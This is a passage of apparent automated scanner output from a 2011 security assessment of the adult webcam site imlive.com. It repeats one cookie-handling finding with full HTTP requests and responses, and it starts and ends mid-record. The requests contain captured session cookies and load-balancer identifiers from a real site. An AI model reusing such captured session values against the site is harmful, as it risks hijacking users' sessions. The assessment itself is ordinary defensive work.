GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: gr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /GuestDiscountClubs.aspx HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Location: /webcam-sign-up/ Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhoqyccjVCXBTf954wWPYvp64MXC0Yh32GzThoTYj52vyg%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:23:52 GMT Connection: close Content-Length: 137
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2fwebcam-sign-up%2f">here</a>.</h2> </body></html>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /awardarena/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:23:45 GMT Connection: close Content-Length: 24651 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /becomehost.aspx HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:12 GMT Connection: close Content-Length: 20899 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /categoryfs.asp?cat=232 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:11:16 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:11:17 GMT Connection: close Content-Length: 18918 Vary: Accept-Encoding
<html> <head> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <title>Find Friends & Romance on Live Webcam Video Chat at ImLive</title> <meta name="d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /categoryms.asp?cat=2 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:11:18 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:11:18 GMT Connection: close Content-Length: 21809 Vary: Accept-Encoding
<html> <head> <title>Mysticism & Spirituality Live Video Chat at ImLive</title> <META NAME="Description" CONTENT="Live video chat with Mysticism & Spirituality experts. Astrologers, Psychics ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /disclaimer.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:11:24 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:11:24 GMT Connection: close Content-Length: 78840 Vary: Accept-Encoding
<html> <head> <title>Disclaimer - Live Video Chat at ImLive</title>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:54 GMT Connection: close Content-Length: 39880 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/adult-shows/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:23:02 GMT Connection: close Content-Length: 25126 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/cam-girls/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:18:36 GMT Connection: close Content-Length: 220458 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/cam-girls/categories/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:18:38 GMT Connection: close Content-Length: 27140 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/cam-girls/hotspots/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Location: /webcam-sign-up/ Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhoqyccjVCXBTf954wWPYvp64MXC0Yh32GzThoTYj52vyg%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:18:41 GMT Connection: close Content-Length: 137
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2fwebcam-sign-up%2f">here</a>.</h2> </body></html>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
